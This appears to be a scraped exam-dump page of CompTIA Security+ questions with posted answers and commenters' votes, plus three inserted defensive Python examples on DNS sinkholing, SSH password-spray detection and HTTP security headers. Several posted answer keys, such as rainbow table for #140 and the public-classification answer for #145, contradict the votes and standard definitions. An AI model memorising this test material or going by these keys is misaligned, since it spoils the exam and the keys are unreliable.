Corrective corrects errors after they are found.
To answer this question, you would have to decide which is more important. I would say Detective. As you would want a solution to find the
problem first. Without that, you cannot quickly correct the problem to reduce the loss. I am going with detective.

This link gives further explanation on the difference:


https://signatureanalytics.com/the-three-main-internal-controls-for-accounting-and-how-they-protect-your-assets/
upvoted 3 times
  [Removed] 1 month, 2 weeks ago
Selected Answer: D
D it is…
upvoted 1 times

  mr_reyes 1 month, 2 weeks ago


Selected Answer: D
I may be way off here, but it seems to be talking about transactions that have already occurred. How can you correct a transaction that has
already occurred, it would seem that you can only prevent further by detecting them before they happen.
upvoted 1 times

  viksap 1 month, 2 weeks ago


Selected Answer: D
DETECTIVE
upvoted 3 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The best control type to use in an accounting department to reduce losses from fraudulent transactions would be a deterrent control. This type of
control is designed to discourage employees from engaging in fraudulent behavior by making it clear that such actions will not be tolerated and
will be punished. Other control types, such as corrective controls, are designed to fix problems after they have occurred, while detective controls
are used to identify fraudulent activity after it has happened. Recovery controls, on the other hand, are designed to restore systems or data after
a disaster or other type of interruption.
upvoted 2 times

  EubertT 1 month, 3 weeks ago


Guys,
This should help, after checking all answers here, I did a research for this similar content. Even the diagram on this link shows the true execution,
check it out:
https://fitsmallbusiness.com/what-are-accounting-
controls/#:~:text=Corrective%20accounting%20controls%20are%20directives,resolve%20weaknesses%20in%20accounting%20controls.
upvoted 2 times

  Sanjucbsa 1 month, 4 weeks ago


Selected Answer: C
Detective controls are designed to detect errors or irregularities that may have occurred. Corrective controls are designed to correct errors or
irregularities that have been detected.
upvoted 3 times

  hieptran 2 weeks, 5 days ago


Agreed, based on the context of this question, fraudulent activity has already occurred.
upvoted 1 times

  Idkanything 2 months, 1 week ago


Selected Answer: D
Detective internal controls are commonly used for things such as "fraud prevention", quality control, and legal compliance.
upvoted 4 times

  babyzilla 2 months, 3 weeks ago


Selected Answer: C
Detective might find the gaps in their process to reduce the losses, but corrective will implement those changes to actually work and see a
difference.
upvoted 1 times

  MarkSc 2 months, 4 weeks ago


I believe C, to reduce loss "from" fraudulent transactions. This would seem to imply the losses have already occurred.
upvoted 1 times

Question #139 Topic 1

A company is receiving emails with links to phishing sites that look very similar to the company's own website address and content. Which of the
following is the BEST way for the company to mitigate this attack?

A. Create a honeynet to trap attackers who access the VPN with credentials obtained by phishing.

B. Generate a list of domains similar to the company's own and implement a DNS sinkhole for each.

C. Disable POP and IMAP on all Internet-facing email servers and implement SMTPS.

D. Use an automated tool to flood the phishing websites with fake usernames and passwords.

Correct Answer: B

Community vote distribution


B (100%)

  Josh_Feng Highly Voted  5 months ago


Selected Answer: B
DNS sinkhole prevents users from entering the site if they have a sinkhole for the domain name. So making a list of fake websites domain name
and making a sinkhole will prevent access to these website if a user tried to search for it on accident.
upvoted 7 times

  FMMIR Most Recent  1 month, 3 weeks ago


Selected Answer: B
The best way for the company to mitigate this attack would be to implement a DNS sinkhole for domains similar to the company's own. A DNS
sinkhole is a security measure that redirects traffic from known malicious or fraudulent websites to a safe location. By generating a list of
domains similar to the company's own and setting up a DNS sinkhole for each, the company can prevent employees from accidentally accessing
phishing websites that mimic the company's own domain. Other solutions such as disabling POP and IMAP on email servers, implementing
SMTPS, or using an automated tool to flood phishing websites with fake credentials may also be effective, but a DNS sinkhole would be the most
direct and effective way to prevent employees from accessing the phishing sites. Creating a honeynet would not be relevant in this scenario.
upvoted 1 times
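To make answer B concrete from the defender's side, here is an added example (not code from the thread or from CompTIA) that enumerates look-alike candidates for a placeholder domain and renders them as RPZ records an internal resolver can sinkhole; "examplecorp.com" and the mutation rules are assumptions for illustration.

```python
"""Enumerate look-alike domains and render DNS sinkhole (RPZ) records.

Added example, not from the ExamTopics thread or CompTIA material. It works
through answer B of Question #139: build the list of domains that resemble
the company's own and sinkhole each one at the internal resolver, so a user
who clicks a phishing link to such a domain gets NXDOMAIN instead of a page.
"examplecorp.com" is a placeholder for the company's real domain.
"""

# Single-character confusions that commonly appear in typosquat domains.
HOMOGLYPHS = {"l": "1i", "i": "l1", "o": "0", "e": "3", "a": "4", "s": "5"}


def generate_lookalikes(domain):
    """Return sorted candidate domains produced by four simple mutations.

    Assumes a single registrable label before the suffix ("examplecorp" in
    "examplecorp.co.uk"); the suffix is carried over unchanged.
    """
    label, _, suffix = domain.partition(".")
    cands = set()
    for i, ch in enumerate(label):
        cands.add(label[:i] + label[i + 1:])            # omission: exmplecorp
        cands.add(label[:i + 1] + ch + label[i + 1:])   # repetition: exampplecorp
        for sub in HOMOGLYPHS.get(ch, ""):              # homoglyph: examp1ecorp
            cands.add(label[:i] + sub + label[i + 1:])
        if i + 1 < len(label):                          # transposition: exapmlecorp
            cands.add(label[:i] + label[i + 1] + ch + label[i + 2:])
    cands.discard(label)  # never sinkhole the company's own domain
    return sorted(f"{c}.{suffix}" for c in cands if c)


def render_rpz(domains):
    """Render RPZ policy records; `CNAME .` is the RPZ action for NXDOMAIN.

    Both the bare name and any subdomain of it are covered so that
    "login.exmplecorp.com" is sinkholed as well.
    """
    lines = []
    for d in domains:
        lines.append(f"{d} CNAME .")
        lines.append(f"*.{d} CNAME .")
    return "\n".join(lines)


def is_sinkholed(query_name, sinkhole_domains):
    """Resolver-side check: does query_name fall under any sinkholed domain?"""
    q = query_name.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in sinkhole_domains)


if __name__ == "__main__":
    lookalikes = generate_lookalikes("examplecorp.com")
    print(f"{len(lookalikes)} candidates; first few: {lookalikes[:5]}")
    print(render_rpz(lookalikes[:2]))
```

The candidate list is also the set to watch in DNS query logs: a hit for a sinkholed name is an early signal that a phishing link reached a user.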

  RonWonkers 4 months, 2 weeks ago


Selected Answer: B
I agree with B
upvoted 3 times

  stoneface 5 months ago


This is a very confusing question -> I'm inclining toward D; other options will not directly try to reduce the danger associated with the fake sites
upvoted 1 times

  sanlibo 2 weeks ago


revenge of the sith, lets DDOS the fckers
upvoted 2 times

  stoneface 5 months ago


After consideration I'm choosing B -> I think the question implies that typosquatting is also on the table. So setting an internal DNS sinkhole
that redirects all similar addresses (including the ones being used in the phishing campaign) to nothing will help mitigate this attack
upvoted 3 times

  andrizo 3 months, 3 weeks ago


but boy, wouldn't it be cool to DoS phishing sites
upvoted 3 times

  zzzfox 4 months, 3 weeks ago


not sure if flooding fake websites is even a legal thing to do...
upvoted 5 times

  Gino_Slim 3 months, 1 week ago


That was a very humorous answer choice to me
upvoted 2 times

Question #140 Topic 1

A SOC operator is receiving continuous alerts from multiple Linux systems indicating that unsuccessful SSH attempts to a functional user ID have
been attempted on each one of them in a short period of time. Which of the following BEST explains this behavior?

A. Rainbow table attack

B. Password spraying

C. Logic bomb

D. Malware bot

Correct Answer: A

Community vote distribution


B (86%) 14%

  stoneface Highly Voted  5 months ago


SSH cannot take hash values as an input, so rainbow attack is off the table.

I'm left with password spraying. ...
upvoted 21 times

  zf1343 6 days, 11 hours ago


With rainbow attack, you don't attack with password hashes! First, you use the table to crack the password for a target user offline and then
use it to attack live systems. Password spraying uses one or few passwords against a list of usernames.
upvoted 2 times

  comeragh Highly Voted  4 months, 4 weeks ago


Selected Answer: B
I believe this is password spraying - "multiple Linux systems to a functional user ID"
upvoted 6 times

  ronniehaang Most Recent  4 days, 6 hours ago


Selected Answer: B
B. Password spraying.

Password spraying is a type of brute-force attack that targets multiple user accounts with a few commonly used passwords. This technique is
used to avoid triggering account lockouts, which are a common security measure to prevent brute-force attacks. The attacker tries a small
number of passwords against many accounts, with the hope of finding one that works. By targeting a large number of systems and trying a
limited number of passwords, the attacker can avoid detection and quickly gain access to one or more systems.
upvoted 1 times
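To show what the pattern in the question looks like at the SOC, here is an added detection example (not code from the thread or from CompTIA) that correlates constructed sshd failure lines collected from several hosts and separates a spray (one user ID, many hosts, few attempts each) from a single-host brute force; host names, IP addresses and log lines are invented samples.

```python
"""Correlate sshd failures from several Linux hosts to spot password spraying.

Added example, not from the ExamTopics thread or CompTIA material. It flags a
user ID that collects failed SSH logins on many different hosts inside a short
window (the Question #140 pattern) and, for contrast, a classic single-host
brute force. Host names, IPs and log lines below are constructed samples.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed syslog-style sshd lines as a central log collector might hold
# them (field 4 is the originating host). One source hits "svc_backup" on
# four hosts within 12 seconds; a second source hammers "alice" on one host.
SAMPLE_LOG = """\
Jan 20 10:01:03 web01 sshd[2311]: Failed password for svc_backup from 203.0.113.9 port 41022 ssh2
Jan 20 10:01:07 web02 sshd[1881]: Failed password for svc_backup from 203.0.113.9 port 41030 ssh2
Jan 20 10:01:12 db01 sshd[4402]: Failed password for svc_backup from 203.0.113.9 port 41044 ssh2
Jan 20 10:01:15 app01 sshd[990]: Failed password for svc_backup from 203.0.113.9 port 41051 ssh2
Jan 20 10:02:40 web01 sshd[2320]: Accepted publickey for alice from 198.51.100.7 port 50122 ssh2
Jan 20 10:05:01 web01 sshd[2333]: Failed password for alice from 198.51.100.7 port 50140 ssh2
Jan 20 10:05:03 web01 sshd[2334]: Failed password for alice from 198.51.100.7 port 50141 ssh2
Jan 20 10:05:05 web01 sshd[2335]: Failed password for alice from 198.51.100.7 port 50142 ssh2
Jan 20 10:05:08 web01 sshd[2336]: Failed password for alice from 198.51.100.7 port 50143 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"
)


def parse_failures(log_text, year=2023):
    """Return (timestamp, host, user, source_ip) tuples, oldest first.

    Syslog lines carry no year, so the caller supplies it.
    """
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["host"], m["user"], m["src"]))
    return sorted(events)


def detect_spray(events, window=timedelta(minutes=5), min_hosts=3):
    """Flag user IDs whose failures span >= min_hosts distinct hosts in `window`.

    "Many hosts, one account, few attempts each" is the shape that stays under
    per-account lockout thresholds and separates spraying from brute force.
    """
    by_user = defaultdict(list)
    for ts, host, user, src in events:
        by_user[user].append((ts, host, src))
    findings = {}
    for user, evs in by_user.items():
        for i, (start, _, _) in enumerate(evs):
            inside = [e for e in evs[i:] if e[0] - start <= window]
            hosts = sorted({h for _, h, _ in inside})
            if len(hosts) >= min_hosts:
                findings[user] = {
                    "hosts": hosts,
                    "sources": sorted({s for _, _, s in inside}),
                    "first": inside[0][0],
                    "last": inside[-1][0],
                }
                break
    return findings


def detect_bruteforce(events, window=timedelta(minutes=5), min_attempts=4):
    """Flag (host, user) pairs with >= min_attempts failures in `window`."""
    by_target = defaultdict(list)
    for ts, host, user, _ in events:
        by_target[(host, user)].append(ts)
    hits = []
    for target, stamps in by_target.items():
        for i, start in enumerate(stamps):
            if sum(1 for t in stamps[i:] if t - start <= window) >= min_attempts:
                hits.append(target)
                break
    return sorted(hits)


if __name__ == "__main__":
    evs = parse_failures(SAMPLE_LOG)
    for user, info in detect_spray(evs).items():
        print(f"SPRAY  {user}: {len(info['hosts'])} hosts from {info['sources']}")
    for host, user in detect_bruteforce(evs):
        print(f"BRUTE  {user}@{host}")
```

The spray rule only fires when the same user ID fails across several hosts, which is why per-host lockout counters alone (the brute-force rule) miss it.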

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The behavior described in the scenario is likely the result of a password spraying attack. Password spraying is a technique used by attackers to
compromise accounts by trying a small number of commonly used passwords against a large number of user accounts. This allows the attacker
to avoid triggering account lockout policies, which are designed to prevent brute-force attacks by locking an account after a certain number of
failed login attempts. In this case, the attacker is likely using password spraying to try to gain access to the Linux systems via SSH using a
functional user ID. A rainbow table attack, a logic bomb, or a malware bot could potentially cause similar symptoms, but the description of the
behavior in the scenario is most consistent with a password spraying attack.
upvoted 2 times

  Mahougbe 3 months, 1 week ago


Selected Answer: B
A Password Spraying Attack is a type of brute force attack where a malicious actor attempts the same password on many accounts before
moving on to another one and repeating the process.
upvoted 4 times

  ostralo 3 months, 3 weeks ago


Selected Answer: A
I will go for the Rainbow table - because the perpetrator could guess a password using the leaked hash from the system prior to the attack to
crack an account.

Password spray attack - using the same password to crack many different accounts.
upvoted 3 times

  Jakalan7 4 months, 2 weeks ago


Selected Answer: B

Clearly B, password spraying.


upvoted 2 times
  tibetbey 4 months, 4 weeks ago
Selected Answer: B
Password Spraying is a variant of what is known as a brute force attack. In a traditional brute force attack, the perpetrator attempts to gain
unauthorized access to a single account by guessing the password "repeatedly" in a very short period of time.
upvoted 2 times

  k9_462 5 months ago


Selected Answer: B
B seems the most correct here. I concur with what stoneface wrote.
upvoted 1 times

  varun0 5 months ago


Selected Answer: B
Password spraying is the answer
upvoted 1 times

Question #141 Topic 1

A tax organization is working on a solution to validate the online submission of documents. The solution should be carried on a portable USB
device that should be inserted on any computer that is transmitting a transaction securely. Which of the following is the BEST certificate for these
requirements?

A. User certificate

B. Self-signed certificate

C. Computer certificate

D. Root certificate

Correct Answer: B

Community vote distribution


A (71%) C (17%) 13%

  deeden Highly Voted  4 months, 2 weeks ago


Selected Answer: A
I thought option A makes sense - if acquired from a publicly trusted CA. Found this link below from IdenTrust about IRS Secure Data Transfer...

https://www.identrust.com/partners/department-treasury-irs-secure-data-transfer
upvoted 5 times

  ronniehaang Most Recent  4 days, 6 hours ago


Selected Answer: A
A. User certificate would be the BEST certificate for these requirements.

A user certificate is a digital certificate that is used to authenticate a user. The certificate is issued by a trusted certificate authority and contains
the user's public key and identity information. In this case, the portable USB device would have the user certificate stored on it, which would be
used to authenticate the user when submitting the online documents. This would ensure that the submission of documents is secure and
validated.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The best certificate for these requirements would be a user certificate. A user certificate is a digital certificate that is issued to an individual and is
used to authenticate the user's identity when accessing a network or system. In this case, the organization could issue a user certificate to each
individual who is authorized to submit documents online, and the certificate could be stored on a portable USB device. When the individual
inserts the USB device into a computer and initiates a transaction, the user certificate would be used to securely authenticate the user's identity
and allow the transaction to be processed. Other types of certificates such as a self-signed certificate, a computer certificate, or a root certificate
could potentially be used for these purposes, but a user certificate would be the most appropriate solution in this scenario.
upvoted 2 times

  EubertT 1 month, 3 weeks ago


I'm going to give details of what the use of each one is, because I'm tired that they are not giving the right answer:

User Certificate: User certificates specify which resources a given user can have access to. They are sometimes used on devices that several
users share. When different users log in, their profile and certificate are automatically loaded, granting them access to their required information.

Self-signed certificate: A self-signed certificate is one that is not signed by a CA at all – neither private nor public. In this case, the certificate is
signed with its own private key, instead of requesting it from a public or a private CA (Certificate Authority).

Root Certificate: Root certificates are the cornerstone of authentication and security in software and on the Internet. They're issued by a certified
authority (CA) and, essentially, verify that the software/website owner is who they say they are.

So for this verification I'm completely 100% sure is A: User certificate


upvoted 1 times

  shitgod 1 month, 1 week ago


You didn't mention anything about a computer certificate.
upvoted 1 times

  Juraj22 2 months, 1 week ago


Selected Answer: A
For me nothing is better than ROOT and USER certificate. We have a situation where you can plug in a USB and validate something via
something....and what is that "something"? You need to validate via ROOT, therefore maybe ROOT. 100% can't be self-signed. Never trust self-
signed. Bad answer as every second answer here. Read the discussion. Also can't be computer, because a computer can change. User or Root;
Root is more secure, User is more common.

upvoted 3 times
  amberlj102 2 months, 2 weeks ago
User certificates are stored under the registry HKEY_CURRENT_USER root and are local to the user account. The ability to carry the certificate on
a USB drive would eliminate option A. I'd have to go with option D
upvoted 1 times

  lordguck 3 months ago


A: should be right, although the question is about an organization. A root cert is used to sign other certs and not used in "production
environments". https://en.wikipedia.org/wiki/Root_certificate
upvoted 1 times

  mark9999 4 months, 1 week ago


Selected Answer: A
Sorry, the web server is code signing the website as validation...it's a user cert
upvoted 2 times

  mark9999 4 months, 1 week ago


Selected Answer: C
"online submission of documents" so contact a Public CA.
The Root certificate stays on the Root CA and issued to any Intermediate CA's.
The computer certs are generated on the intermediate(for a Web Server, to do Online submissions) and then both the Private key(on a Company
Web Server) and the X509 computer cert public key is with the Tax Organization.
They need to make the cert portable so put it on a USB device, attach to any computer.
User certs are for use by users for e-mail, EFS and client auth
Self-signed certs are unsafe for public facing apps like this one.
Root Certs are for the CA's not the end users.
upvoted 4 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: D
I guess it's D
upvoted 1 times

  RonWonkers 4 months, 1 week ago


Sorry, i'm going with A
upvoted 1 times

  enginne 4 months, 2 weeks ago


Selected Answer: A
After granting the power of attorney, the user signs the documents, the person responsible for the financial notification
upvoted 4 times

  sonerim88 4 months, 3 weeks ago


Can anyone explain this question, please? I checked 3 different resources and found 3 different answers.
upvoted 4 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: D
Root Certificate should be more appropriate
upvoted 2 times

  Strykar 4 months, 1 week ago


and why is that?
upvoted 1 times

  banditring 5 months ago


but shouldn't you never trust a self-signed certificate? Someone explain how this is correct for me please.
upvoted 1 times

  okay123 5 months ago


self-signed certificate is a certificate that's signed with its own private key.
upvoted 1 times

  zzzfox 4 months, 3 weeks ago


ok, a self-signed certificate is used within your own company; the question is a bit unclear. When it's asking for any computer, not sure if it is referring to
any computer within the tax org.
upvoted 2 times

Question #142 Topic 1

A routine audit of medical billing claims revealed that several claims were submitted without the subscriber's knowledge. A review of the audit
logs for the medical billing company's system indicated a company employee downloaded customer records and adjusted the direct deposit
information to a personal bank account.
Which of the following does this action describe?

A. Insider threat

B. Social engineering

C. Third-party risk

D. Data breach

Correct Answer: A

Community vote distribution


A (100%)

  i_bird Highly Voted  4 months, 2 weeks ago


Selected Answer: A
going to jail..lol
upvoted 9 times

  joelitof 4 months, 1 week ago


xD rip that person
upvoted 2 times

  RonWonkers Most Recent  4 months, 2 weeks ago


Selected Answer: A
It is A, company employee = insider threat
upvoted 4 times

  comeragh 4 months, 4 weeks ago


Selected Answer: A
A - Insider Threat
upvoted 4 times

  tibetbey 4 months, 4 weeks ago


Selected Answer: A
Insider threat is the potential for an insider to use their authorized access or understanding of an organization to harm that organization
upvoted 3 times

Question #143 Topic 1

A recent audit cited a risk involving numerous low-criticality vulnerabilities created by a web application using a third-party library. The
development staff state there are still customers using the application even though it is end of life and it would be a substantial burden to update
the application for compatibility with more secure libraries. Which of the following would be the MOST prudent course of action?

A. Accept the risk if there is a clear road map for timely decommission.

B. Deny the risk due to the end-of-life status of the application.

C. Use containerization to segment the application from other applications to eliminate the risk.

D. Outsource the application to a third-party developer group.

Correct Answer: C

Community vote distribution


C (54%) A (46%)

  [Removed] Highly Voted  5 months ago


Selected Answer: C
I think C is correct. You shouldn't have to take any risk at all if you can containerize the application. The goal of containerization is to isolate an
application to prevent malware, intruders, system resources or other applications from interacting with the application – and any of its sensitive
information — secured by the container.
upvoted 29 times

  [Removed] 5 months ago


Resource:https://www.proofpoint.com/sites/default/files/pp-containerization-and-app-reputation.pdf
upvoted 2 times

  stoneface Highly Voted  5 months ago


Selected Answer: A
IMO they should Accept the risk if there is a clear road map for timely decommission ->
upvoted 9 times

  deeden 4 months, 2 weeks ago


I agree with A. The web app will have the same threat vector 3rd-party library even after containerization, and is rated as low risk vulnerability.
upvoted 3 times
T4IT Most Recent 1 week, 5 days ago
Selected Answer: A
low risk vulnerability!! going with A
upvoted 1 times
ZDW 1 week, 5 days ago
Selected Answer: C
I think it is C because nothing mentions they want to decommission it; they have customers that still use it and they don't want to pay for an improved, updated app, so containerizing it makes sense. It allows them to keep it for customers to use, keeps it secure, and doesn't cost what the update would.
upvoted 2 times
xxxdolorxxx 1 week, 5 days ago
Selected Answer: A
I'm going with A.
upvoted 1 times
Deeppain90 1 week, 6 days ago
Selected Answer: A
It's the best option.
upvoted 1 times
viksap 1 month, 2 weeks ago
Not sure if I'm thinking in the right direction, but containerization would be the better choice even though the company is planning to decommission it. Any thoughts?
upvoted 1 times
[Removed] 1 month, 3 weeks ago
Selected Answer: C
Why would you choose A? These are just CompTIA questions. Customers are still using the application. Companies won't sporadically kill an application just because. If special requirements still exist, then the application will be used until further notification. Some companies still use software/hardware that is classified as legacy. Companies are required to continue their business operations normally; they don't just automatically switch on or off. Answer C seems appropriate to me.
upvoted 2 times
FMMIR 1 month, 3 weeks ago
Selected Answer: A
The most prudent course of action would be to accept the risk if there is a clear road map for timely decommission. If the application is end of life
and there are still customers using it, it may not be feasible to update the application for compatibility with more secure libraries. In this case, it
would be best to accept the risk and create a plan to decommission the application in a timely manner to minimize the potential impact of the
vulnerabilities. This could involve transitioning customers to a different application or working with the development team to implement other
mitigation strategies
upvoted 1 times
rodwave 2 months, 3 weeks ago
Selected Answer: A
Answer: Accept the risk if there is a clear road map for timely decommission.

The audit found low-criticality vulnerabilities so, from the organization's perspective, it's not an issue that requires immediate attention. If the organization understands the level of severity of the vulnerabilities and plans to decommission the application when they see fit, then that would be the most prudent (practical) action for them.

There are still users that are using the application, so there should be time given to notify the users when it is time to decommission the
application to minimize disruption.
upvoted 4 times
carpathia 2 months, 3 weeks ago
Selected Answer: A
Containerization in Sec+ documentation mostly refers to MDM; I would go with A. The rest involves virtualization etc. I doubt that would be the answer. Maybe I am wrong; someone with actual experience in the field would be more precise.
upvoted 2 times
[Removed] 3 months, 3 weeks ago
Selected Answer: A
"Prudent course of action": prudent = acting with or showing care and thought for the future.
A. Accept the risk if there is a clear road map for timely decommission.
upvoted 4 times
Zenvega 4 months ago
Selected Answer: A
I'm going with A, because C says to incorporate containerization to "eliminate the risk"; I don't believe it will eliminate all risk.
upvoted 3 times
i_bird 4 months, 2 weeks ago
Selected Answer: A
Keywords:
1. numerous LOW-CRITICALITY vulns
2. EOL

Accept the risk...
upvoted 3 times
RonWonkers 4 months, 2 weeks ago
Selected Answer: C
I would say it's C. I found 2 other sites that claim C as well, but they might have just copied each other's answers.

https://www.comptiadump.com/3-mar-2022-new-security-sy0-601-dumps-with-vce-and-pdf-from-passleader-new-questions.html

https://quizlet.com/716263963/sy0-601-exam-flash-cards/
upvoted 2 times
Swarupam 4 months, 4 weeks ago
Selected Answer: C
going with C here
upvoted 2 times
comeragh 5 months ago
Selected Answer: A
I would go with A for this one
upvoted 3 times
Question #144 Topic 1

A security analyst is evaluating solutions to deploy an additional layer of protection for a web application. The goal is to allow only encrypted
communications without relying on network devices. Which of the following can be implemented?

A. HTTP security header

B. DNSSEC implementation

C. SRTP

D. S/MIME

Correct Answer: A

Community vote distribution


A (100%)

stoneface Highly Voted 5 months ago
Selected Answer: A
When enabled on the server, HTTP Strict Transport Security (HSTS), part of HTTP Security header, enforces the use of encrypted HTTPS
connections instead of plain-text HTTP communication.
upvoted 13 times
ronniehaang Most Recent 4 days, 6 hours ago
Selected Answer: A
A. HTTP security header - An HTTP security header can be added to the web application to enforce the use of encryption for all communication.
This header can specify the use of Transport Layer Security (TLS) or Secure Sockets Layer (SSL) protocols to ensure that all data transmitted
between the web server and client is encrypted. The header can also configure various security-related options such as disabling caching,
preventing cross-site scripting (XSS) attacks, and mitigating cross-site request forgery (CSRF) attacks.

HTTP security headers include:

Strict-Transport-Security (HSTS)
X-XSS-Protection
X-Content-Type-Options
X-Frame-Options
Content-Security-Policy
Note: HTTP security headers are not a replacement for encryption but rather a way to enforce encryption.
upvoted 1 times
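Added example for this question (not code from ExamTopics, CompTIA or any commenter): a small Python audit of the headers a web application can set itself, as the answers above describe, with a weak response beside a hardened one. Both response header blocks are constructed for illustration; the header names and values are the real ones, while the one-year HSTS `max-age` floor is a common hardening baseline assumed here, not something the question states.

```python
"""Audit HTTP security headers and show a hardened set.

Added example for the Question #144 thread, not code from ExamTopics or
CompTIA. Both response header blocks below are constructed for illustration.
"""
import re

# One year in seconds: the HSTS lifetime most hardening baselines expect
# (an assumption for this example, not a value from the question).
MIN_HSTS_MAX_AGE = 31536000

# Headers the application can set itself. None means the value gets its own
# check; a string must match exactly; a tuple lists the acceptable values.
EXPECTED = {
    "strict-transport-security": None,
    "content-security-policy": None,
    "x-content-type-options": "nosniff",
    "x-frame-options": ("DENY", "SAMEORIGIN"),
}

# Constructed: a server that "has HSTS" but in a way that buys almost nothing.
WEAK_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html
Strict-Transport-Security: max-age=300
X-Frame-Options: ALLOWALL
"""

# Constructed: the same server with the headers the thread describes.
HARDENED_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Security-Policy: default-src 'self'; upgrade-insecure-requests
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
"""


def parse_headers(raw):
    """Raw status line + headers -> dict keyed by lower-cased header name."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:  # [0] is the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def check_hsts(value):
    """Findings for a Strict-Transport-Security value."""
    findings = []
    m = re.search(r"max-age=(\d+)", value, re.I)
    if not m:
        return ["strict-transport-security has no max-age"]
    if int(m.group(1)) < MIN_HSTS_MAX_AGE:
        findings.append(f"strict-transport-security max-age={m.group(1)} "
                        f"is below {MIN_HSTS_MAX_AGE}")
    if "includesubdomains" not in value.lower():
        findings.append("strict-transport-security lacks includeSubDomains")
    return findings


def audit(raw):
    """Return a list of findings; an empty list means every check passed."""
    headers = parse_headers(raw)
    findings = []
    for name, expected in EXPECTED.items():
        if name not in headers:
            findings.append(f"missing {name}")
            continue
        value = headers[name]
        if name == "strict-transport-security":
            findings.extend(check_hsts(value))
        elif isinstance(expected, tuple) and value.upper() not in expected:
            findings.append(f"{name} has unexpected value {value!r}")
        elif isinstance(expected, str) and value.lower() != expected:
            findings.append(f"{name} should be {expected!r}, got {value!r}")
    return findings


if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit(resp) or "no findings")
```

Two caveats worth keeping in mind when relying on this header: HSTS only takes effect after the browser has seen it once over HTTPS (or the host is on the preload list), and the header itself encrypts nothing, TLS on the server still does that work. The `upgrade-insecure-requests` CSP directive closes the remaining gap of `http://` subresources on the page.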
rhocale 1 month, 2 weeks ago
I thought HTTP isn't secure.
upvoted 1 times
deeden 4 months, 2 weeks ago
Selected Answer: A
https://www.youtube.com/watch?v=064yDG7Rz80
upvoted 1 times
comeragh 4 months, 4 weeks ago
Selected Answer: A
I would agree with A on this one
S/MIME - relates to email
SRTP - relates to VOIP
upvoted 4 times
Question #145 Topic 1

A company labeled some documents with the public sensitivity classification. This means the documents can be accessed by:

A. employees of other companies and the press.

B. all members of the department that created the documents.

C. only the company's employees and those listed in the document.

D. only the individuals listed in the documents.

Correct Answer: C

Community vote distribution


A (100%)

stoneface Highly Voted 5 months ago
Selected Answer: A
Public (unclassified)—there are no restrictions on viewing the data. Public information presents no risk to an organization if it is disclosed but
does present a risk if it is modified or not available.
upvoted 17 times
stonefaces_kitten 2 months, 2 weeks ago
Thank you (:
upvoted 3 times
Deeppain90 Most Recent 2 weeks, 5 days ago
Ohh, I get it now: it's "company labeled some documents with the public sensitivity classification", so DOCUMENTS in the company, even if they are unclassified, are not for sharing; from the answers, C is the one (sorry for my grammar).
upvoted 2 times
Deeppain90 2 weeks, 5 days ago
Selected Answer: A
Why is C the chosen answer? 0o
upvoted 1 times
Boubou480 4 weeks ago
Selected Answer: A
A company labeled some documents with the public sensitivity classification means that the documents can be accessed by employees of other
companies and the press. The public sensitivity classification indicates that the documents are intended for public access and can be shared
with a wide audience, including employees of other companies and members of the media. This classification is often used for documents that
contain information that is not sensitive or confidential and that can be shared freely with the public. In contrast, documents with other sensitivity
classifications, such as "confidential" or "private," may have more restricted access and may only be shared with a limited group of individuals,
such as employees of the company or those listed in the document.
upvoted 2 times
Nome02 2 months ago
A is the correct answer. The Public Sensitivity is Public.
upvoted 1 times
Gino_Slim 3 months, 1 week ago
Selected Answer: A
I ain't going to lie... I read this all the way wrong. I was thinking that it was referring to NOT allowing the public to see it. But...BUT it is classified as
"Public" information.
upvoted 2 times
aslakhaege 4 months, 3 weeks ago
Selected Answer: A
A is correct
upvoted 1 times
k9_462 5 months ago
Selected Answer: A
Should be A. Public is the least sensitive data class.
upvoted 3 times
Question #146 Topic 1

Which of the following is the MOST relevant security check to be performed before embedding third-party libraries in developed code?

A. Check to see if the third party has resources to create dedicated development and staging environments.

B. Verify the number of companies that downloaded the third-party code and the number of contributions on the code repository.

C. Assess existing vulnerabilities affecting the third-party code and the remediation efficiency of the libraries' developers.

D. Read multiple penetration-testing reports for environments running software that reused the library.

Correct Answer: C

Community vote distribution


C (100%)

SabITSec 2 months, 1 week ago
B is a possible answer too.
upvoted 1 times
Imanism 3 months, 2 weeks ago
Selected Answer: C
What to be done to best prevent issues in third-party code?

Establish a baseline and process for every third-party software that is introduced into the organisation, including performing a risk assessment to
establish the risk associated with implementing a certain piece of code.
upvoted 2 times
RonWonkers 4 months, 2 weeks ago
Selected Answer: C
My guess is C
upvoted 2 times
comeragh 4 months, 4 weeks ago
Selected Answer: C
I would go with C also on this one. It seems to make the most sense.
upvoted 4 times
varun0 5 months ago
Selected Answer: C
C is correct
upvoted 3 times
Question #147 Topic 1

A help desk technician receives an email from the Chief Information Officer (CIO) asking for documents. The technician knows the CIO is on
vacation for a few weeks. Which of the following should the technician do to validate the authenticity of the email?

A. Check the metadata in the email header of the received path in reverse order to follow the email's path.

B. Hover the mouse over the CIO's email address to verify the email address.

C. Look at the metadata in the email header and verify the "From:" line matches the CIO's email address.

D. Forward the email to the CIO and ask if the CIO sent the email requesting the documents.

Correct Answer: A

Community vote distribution


A (52%) D (29%) Other

stoneface Highly Voted 5 months ago
Selected Answer: A
https://www.cmu.edu/iso/news/2020/email-spoofing.html
upvoted 6 times
vandybear 3 months ago
